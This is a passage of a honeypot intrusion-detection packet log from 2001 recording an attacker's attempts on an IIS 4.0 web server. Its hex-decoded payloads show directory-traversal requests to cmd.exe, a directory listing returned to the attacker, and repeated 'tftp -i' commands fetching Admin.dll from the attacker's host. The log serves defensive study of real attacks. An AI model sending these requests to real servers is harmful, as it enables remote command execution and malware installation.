      ack=483908274 off=5 res=0 win=8608 urp=0 chksum=23899
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25603) [2001-09-18 10:21:42]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=45429 flags=0 offset=0 TTL=118 chksum=41509
TCP:  port=4419 -> dport: 80  flags=*****R** seq=483908274
      ack=2875805349 off=5 res=0 win=0 urp=0 chksum=64383
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25604) [2001-09-18 10:21:42]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=45685 flags=0 offset=0 TTL=118 chksum=41249
TCP:  port=4454 -> dport: 80  flags=******S* seq=483908463
      ack=0 off=6 res=0 win=8192 urp=0 chksum=48372
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25605) [2001-09-18 10:21:42]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=63238 flags=0 offset=0 TTL=128 chksum=21136
TCP:  port=80 -> dport: 4454  flags=***A**S* seq=555058
      ack=483908464 off=6 res=0 win=8760 urp=0 chksum=17009
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25606) [2001-09-18 10:21:42]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=45941 flags=0 offset=0 TTL=118 chksum=57381
TCP:  port=4419 -> dport: 80  flags=*****R** seq=483908274
      ack=483908274 off=5 res=0 win=0 urp=0 chksum=65028
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25607) [2001-09-18 10:21:42]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=64629 flags=0 offset=0 TTL=119 chksum=22053
TCP:  port=4454 -> dport: 80  flags=***A**** seq=483908464
      ack=555059 off=5 res=0 win=8760 urp=0 chksum=23086
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25608) [2001-09-18 10:21:42]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=117 ID=64885 flags=0 offset=0 TTL=119 chksum=21720
TCP:  port=4454 -> dport: 80  flags=***AP*** seq=483908464
      ack=555059 off=5 res=0 win=8760 urp=0 chksum=17104
Payload:  length = 71

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C   GET /scripts/...
010 : 2E 2F 41 64 6D 69 6E 2E 64 6C 6C 20 64 6C 6C 20   ./Admin.dll dll 
020 : 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20   HTTP/1.0..Host: 
030 : 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E   www..Connnection
040 : 3A 20 63 6C 6F 73 65                              : close
----------------------------------------------------------------------------
--
#(2 - 25609) [2001-09-18 10:21:42]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=318 ID=775 flags=0 offset=0 TTL=128 chksum=17790
TCP:  port=80 -> dport: 4454  flags=***AP*** seq=555059
      ack=483908541 off=5 res=0 win=8683 urp=0 chksum=18674
Payload:  length = 278

000 : 48 54 54 50 2F 31 2E 31 20 35 30 30 20 53 65 72   HTTP/1.1 500 Ser
010 : 76 65 72 20 45 72 72 6F 72 0D 0A 53 65 72 76 65   ver Error..Serve
020 : 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 53   r: Microsoft-IIS
030 : 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 2C   /4.0..Date: Tue,
040 : 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 3A    18 Sep 2001 16:
050 : 30 35 3A 32 33 20 47 4D 54 0D 0A 43 6F 6E 74 65   05:23 GMT..Conte
060 : 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74   nt-Type: text/ht
070 : 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67   ml..Content-Leng
080 : 74 68 3A 20 31 33 39 0D 0A 0D 0A 3C 68 74 6D 6C   th: 139....<html
090 : 3E 3C 68 65 61 64 3E 3C 74 69 74 6C 65 3E 45 72
><head><title>Er
0a0 : 72 6F 72 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61
ror</title></hea
0b0 : 64 3E 3C 62 6F 64 79 3E 54 68 65 20 70 72 6F 63   d><body>The
proc
0c0 : 65 73 73 20 63 61 6E 6E 6F 74 20 61 63 63 65 73   ess cannot acces
0d0 : 73 20 74 68 65 20 66 69 6C 65 20 62 65 63 61 75   s the file becau
0e0 : 73 65 20 69 74 20 69 73 20 62 65 69 6E 67 20 75   se it is being u
0f0 : 73 65 64 20 62 79 20 61 6E 6F 74 68 65 72 20 70   sed by another p
100 : 72 6F 63 65 73 73 2E 20 3C 2F 62 6F 64 79 3E 3C   rocess.
</body><
110 : 2F 68 74 6D 6C 3E                                 /html>
----------------------------------------------------------------------------
--
#(2 - 25610) [2001-09-18 10:21:42]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=1031 flags=0 offset=0 TTL=128 chksum=17812
TCP:  port=80 -> dport: 4454  flags=***A***F seq=555337
      ack=483908541 off=5 res=0 win=8683 urp=0 chksum=22807
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25611) [2001-09-18 10:21:43]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=64630 flags=0 offset=0 TTL=118 chksum=22308
TCP:  port=4454 -> dport: 80  flags=*****R** seq=483908541
      ack=179402671 off=5 res=0 win=0 urp=0 chksum=29184
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25612) [2001-09-18 10:21:43]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=64886 flags=0 offset=0 TTL=118 chksum=22048
TCP:  port=4486 -> dport: 80  flags=******S* seq=483908786
      ack=0 off=6 res=0 win=8192 urp=0 chksum=48017
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25613) [2001-09-18 10:21:43]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=5127 flags=0 offset=0 TTL=128 chksum=13712
TCP:  port=80 -> dport: 4486  flags=***A**S* seq=556149
      ack=483908787 off=6 res=0 win=8760 urp=0 chksum=15563
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25614) [2001-09-18 10:21:43]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=65142 flags=0 offset=0 TTL=118 chksum=38180
TCP:  port=4454 -> dport: 80  flags=*****R** seq=483908541
      ack=483908541 off=5 res=0 win=0 urp=0 chksum=64459
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25615) [2001-09-18 10:21:43]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=6775 flags=0 offset=0 TTL=119 chksum=14372
TCP:  port=4486 -> dport: 80  flags=***A**** seq=483908787
      ack=556150 off=5 res=0 win=8760 urp=0 chksum=21640
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25616) [2001-09-18 10:21:43]  WEB-IIS cmd.exe access
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=137 ID=7031 flags=0 offset=0 TTL=119 chksum=14019
TCP:  port=4486 -> dport: 80  flags=***AP*** seq=483908787
      ack=556150 off=5 res=0 win=8760 urp=0 chksum=38842
Payload:  length = 91

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C   GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32   ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20   /cmd.exe?/c+dir 
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F   dir HTTP/1.0..Ho
040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63   st: www..Connnec
050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65                  tion: close
----------------------------------------------------------------------------
--
#(2 - 25617) [2001-09-18 10:21:43]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=231 ID=6407 flags=0 offset=0 TTL=128 chksum=12245
TCP:  port=80 -> dport: 4486  flags=***AP*** seq=556150
      ack=483908884 off=5 res=0 win=8663 urp=0 chksum=720
Payload:  length = 191

000 : 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D   HTTP/1.1 200 OK.
010 : 0A 53 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F   .Server: Microso
020 : 66 74 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65   ft-IIS/4.0..Date
030 : 3A 20 54 75 65 2C 20 31 38 20 53 65 70 20 32 30   : Tue, 18 Sep 20
040 : 30 31 20 31 36 3A 30 35 3A 32 34 20 47 4D 54 0D   01 16:05:24 GMT.
050 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61   .Content-Type: a
060 : 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65 74   pplication/octet
070 : 2D 73 74 72 65 61 6D 0D 0A 56 6F 6C 75 6D 65 20   -stream..Volume 
080 : 69 6E 20 64 72 69 76 65 20 43 20 68 61 73 20 6E   in drive C has n
090 : 6F 20 6C 61 62 65 6C 2E 0D 0A 56 6F 6C 75 6D 65   o label...Volume
0a0 : 20 53 65 72 69 61 6C 20 4E 75 6D 62 65 72 20 69    Serial Number i
0b0 : 73 20 38 30 42 34 2D 38 39 43 41 0D 0A 0D 0A      s 80B4-89CA....
----------------------------------------------------------------------------
--
#(2 - 25618) [2001-09-18 10:21:43]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=403 ID=6663 flags=0 offset=0 TTL=128 chksum=11817
TCP:  port=80 -> dport: 4486  flags=***AP**F seq=556341
      ack=483908884 off=5 res=0 win=8663 urp=0 chksum=24388
Payload:  length = 363

000 : 20 44 69 72 65 63 74 6F 72 79 20 6F 66 20 43 3A    Directory of C:
010 : 5C 49 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73   \Inetpub\scripts
020 : 0D 0A 0D 0A 30 39 2F 31 38 2F 30 31 20 20 31 31   ....09/18/01  11
030 : 3A 30 35 61 20 20 20 20 20 20 20 20 3C 44 49 52   :05a        <DIR
040 : 3E 20 20 20 20 20 20 20 20 20 20 2E 0D 0A 30 39   >          ...09
050 : 2F 31 38 2F 30 31 20 20 31 31 3A 30 35 61 20 20   /18/01  11:05a  
060 : 20 20 20 20 20 20 3C 44 49 52 3E 20 20 20 20 20         <DIR>

070 : 20 20 20 20 20 2E 2E 0D 0A 30 39 2F 31 38 2F 30        ....09/18/0
080 : 31 20 20 31 31 3A 30 34 61 20 20 20 20 20 20 20   1  11:04a       
090 : 20 20 20 20 20 20 20 20 20 35 37 2C 33 34 34 20            57,344 
0a0 : 54 46 54 50 32 30 36 0D 0A 30 39 2F 31 38 2F 30   TFTP206..09/18/0
0b0 : 31 20 20 31 31 3A 30 35 61 20 20 20 20 20 20 20   1  11:05a       
0c0 : 20 20 20 20 20 20 20 20 20 31 36 2C 33 38 34 20            16,384 
0d0 : 54 46 54 50 32 32 32 0D 0A 30 39 2F 31 38 2F 30   TFTP222..09/18/0
0e0 : 31 20 20 31 31 3A 30 35 61 20 20 20 20 20 20 20   1  11:05a       
0f0 : 20 20 20 20 20 20 20 20 20 35 37 2C 33 34 34 20            57,344 
100 : 54 46 54 50 38 34 0D 0A 20 20 20 20 20 20 20 20   TFTP84..        
110 : 20 20 20 20 20 20 20 35 20 46 69 6C 65 28 73 29          5 File(s)
120 : 20 20 20 20 20 20 20 20 31 33 31 2C 30 37 32 20           131,072 
130 : 62 79 74 65 73 0D 0A 20 20 20 20 20 20 20 20 20   bytes..         
140 : 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                   
150 : 20 32 2C 31 30 30 2C 35 34 33 2C 34 38 38 20 62    2,100,543,488 b
160 : 79 74 65 73 20 66 72 65 65 0D 0A                  ytes free..
----------------------------------------------------------------------------
--
#(2 - 25619) [2001-09-18 10:21:43]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=15479 flags=0 offset=0 TTL=118 chksum=5924
TCP:  port=4486 -> dport: 80  flags=*****R** seq=483908884
      ack=1832837531 off=5 res=0 win=0 urp=0 chksum=41999
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25620) [2001-09-18 10:21:43]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=15735 flags=0 offset=0 TTL=118 chksum=5664
TCP:  port=4519 -> dport: 80  flags=******S* seq=484037059
      ack=0 off=6 res=0 win=8192 urp=0 chksum=50781
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25621) [2001-09-18 10:21:43]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=7943 flags=0 offset=0 TTL=128 chksum=10896
TCP:  port=80 -> dport: 4519  flags=***A**S* seq=556630
      ack=484037060 off=6 res=0 win=8760 urp=0 chksum=17846
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25622) [2001-09-18 10:21:44]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=17015 flags=0 offset=0 TTL=118 chksum=20772
TCP:  port=4486 -> dport: 80  flags=*****R** seq=483908884
      ack=483908884 off=5 res=0 win=0 urp=0 chksum=63741
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25623) [2001-09-18 10:21:44]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=25975 flags=0 offset=0 TTL=119 chksum=60707
TCP:  port=4519 -> dport: 80  flags=***A**** seq=484037060
      ack=556631 off=5 res=0 win=8760 urp=0 chksum=23923
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25624) [2001-09-18 10:21:44]  WEB-IIS cmd.exe access
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=192 ID=26231 flags=0 offset=0 TTL=119 chksum=60299
TCP:  port=4519 -> dport: 80  flags=***AP*** seq=484037060
      ack=556631 off=5 res=0 win=8760 urp=0 chksum=26065
Payload:  length = 136

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C   GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32   ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 66 74 70   /cmd.exe?/c+tftp
030 : 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 2E 31 38    -i 65.29.243.18
040 : 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 6C 6C 20   0 GET Admin.dll 
050 : 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 30 63 3A   c:\Admin.dll 0c:
060 : 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 2F   \Admin.dll HTTP/
070 : 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A   1.0..Host: www..
080 : 43 6F 6E 6E 6E 65 63 74                           Connnect
----------------------------------------------------------------------------
--
#(2 - 25625) [2001-09-18 10:21:44]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=395 ID=8711 flags=0 offset=0 TTL=128 chksum=9777
TCP:  port=80 -> dport: 4519  flags=***AP*** seq=556631
      ack=484037212 off=5 res=0 win=8608 urp=0 chksum=62259
Payload:  length = 355

000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74   HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76   eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49   er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65   S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36   , 18 Sep 2001 16
050 : 3A 30 35 3A 32 34 20 47 4D 54 0D 0A 43 6F 6E 74   :05:24 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D   ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74   .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61   ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F   n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65   rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69   cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65   cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69   d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65   ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72   t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20   s.  The headers 
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72   it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E                                          re>
----------------------------------------------------------------------------
--
#(2 - 25626) [2001-09-18 10:21:44]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=8967 flags=0 offset=0 TTL=128 chksum=9876
TCP:  port=80 -> dport: 4519  flags=***A***F seq=556986
      ack=484037212 off=5 res=0 win=8608 urp=0 chksum=23567
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25627) [2001-09-18 10:21:44]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=37751 flags=0 offset=0 TTL=118 chksum=49187
TCP:  port=4519 -> dport: 80  flags=*****R** seq=484037212
      ack=0 off=5 res=0 win=0 urp=0 chksum=64894
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25628) [2001-09-18 10:21:44]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=38007 flags=0 offset=0 TTL=118 chksum=48927
TCP:  port=4559 -> dport: 80  flags=******S* seq=484037472
      ack=0 off=6 res=0 win=8192 urp=0 chksum=50328
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25629) [2001-09-18 10:21:44]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=11015 flags=0 offset=0 TTL=128 chksum=7824
TCP:  port=80 -> dport: 4559  flags=***A**S* seq=557271
      ack=484037473 off=6 res=0 win=8760 urp=0 chksum=16752
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25630) [2001-09-18 10:21:44]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=38263 flags=0 offset=0 TTL=118 chksum=65059
TCP:  port=4519 -> dport: 80  flags=*****R** seq=484037212
      ack=484037212 off=5 res=0 win=0 urp=0 chksum=3657
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25631) [2001-09-18 10:21:45]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=632 flags=0 offset=0 TTL=119 chksum=20515
TCP:  port=4559 -> dport: 80  flags=***A**** seq=484037473
      ack=557272 off=5 res=0 win=8760 urp=0 chksum=22829
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25639) [2001-09-18 10:21:53]  WEB-IIS cmd.exe access
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=192 ID=42111 flags=0 offset=0 TTL=119 chksum=44419
TCP:  port=4559 -> dport: 80  flags=***AP*** seq=484037473
      ack=557272 off=5 res=0 win=8760 urp=0 chksum=24715
Payload:  length = 136

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C   GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32   ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 66 74 70   /cmd.exe?/c+tftp
030 : 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 2E 31 38    -i 65.29.243.18
040 : 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 6C 6C 20   0 GET Admin.dll 
050 : 64 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 30 64 3A   d:\Admin.dll 0d:
060 : 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 2F   \Admin.dll HTTP/
070 : 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A   1.0..Host: www..
080 : 43 6F 6E 6E 6E 65 63 74                           Connnect
----------------------------------------------------------------------------
--
#(2 - 25640) [2001-09-18 10:21:53]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=395 ID=30727 flags=0 offset=0 TTL=128 chksum=53296
TCP:  port=80 -> dport: 4559  flags=***AP*** seq=557272
      ack=484037625 off=5 res=0 win=8608 urp=0 chksum=60909
Payload:  length = 355

000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74   HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76   eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49   er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65   S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36   , 18 Sep 2001 16
050 : 3A 30 35 3A 33 34 20 47 4D 54 0D 0A 43 6F 6E 74   :05:34 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D   ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74   .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61   ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F   n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65   rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69   cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65   cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69   d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65   ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72   t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20   s.  The headers 
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72   it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E                                          re>
----------------------------------------------------------------------------
--
#(2 - 25641) [2001-09-18 10:21:53]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=30983 flags=0 offset=0 TTL=128 chksum=53395
TCP:  port=80 -> dport: 4559  flags=***A***F seq=557627
      ack=484037625 off=5 res=0 win=8608 urp=0 chksum=22473
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25642) [2001-09-18 10:21:54]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=49535 flags=0 offset=0 TTL=118 chksum=37403
TCP:  port=4559 -> dport: 80  flags=*****R** seq=484037625
      ack=0 off=5 res=0 win=0 urp=0 chksum=64441
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25643) [2001-09-18 10:21:54]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=44 ID=49791 flags=0 offset=0 TTL=118 chksum=37143
TCP:  port=1476 -> dport: 80  flags=******S* seq=485198619
      ack=0 off=6 res=0 win=8192 urp=0 chksum=6359
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25644) [2001-09-18 10:21:54]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=32263 flags=0 offset=0 TTL=128 chksum=52111
TCP:  port=80 -> dport: 1476  flags=***A**S* seq=566664
      ack=485198620 off=6 res=0 win=8760 urp=0 chksum=28925
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25645) [2001-09-18 10:21:54]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=50047 flags=0 offset=0 TTL=118 chksum=53275
TCP:  port=4559 -> dport: 80  flags=*****R** seq=484037625
      ack=484037625 off=5 res=0 win=0 urp=0 chksum=2791
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25646) [2001-09-18 10:21:54]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=60543 flags=0 offset=0 TTL=119 chksum=26139
TCP:  port=1476 -> dport: 80  flags=***A**** seq=485198620
      ack=566665 off=5 res=0 win=8760 urp=0 chksum=35002
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25647) [2001-09-18 10:21:54]  WEB-IIS cmd.exe access
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=192 ID=60799 flags=0 offset=0 TTL=119 chksum=25731
TCP:  port=1476 -> dport: 80  flags=***AP*** seq=485198620
      ack=566665 off=5 res=0 win=8760 urp=0 chksum=36632
Payload:  length = 136

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C   GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32   ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 66 74 70   /cmd.exe?/c+tftp
030 : 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 2E 31 38    -i 65.29.243.18
040 : 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 6C 6C 20   0 GET Admin.dll 
050 : 65 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 30 65 3A   e:\Admin.dll 0e:
060 : 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 2F   \Admin.dll HTTP/
070 : 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A   1.0..Host: www..
080 : 43 6F 6E 6E 6E 65 63 74                           Connnect
----------------------------------------------------------------------------
--
#(2 - 25648) [2001-09-18 10:21:54]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=33799 flags=0 offset=0 TTL=128 chksum=50579
TCP:  port=80 -> dport: 1476  flags=***A**** seq=566665
      ack=485198772 off=5 res=0 win=8608 urp=0 chksum=35002
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25766) [2001-09-18 10:22:49]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=395 ID=26890 flags=0 offset=0 TTL=128 chksum=57133
TCP:  port=80 -> dport: 1476  flags=***AP*** seq=566665
      ack=485198772 off=5 res=0 win=8608 urp=0 chksum=7295
Payload:  length = 355

000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74   HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76   eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49   er: Microsoft-II
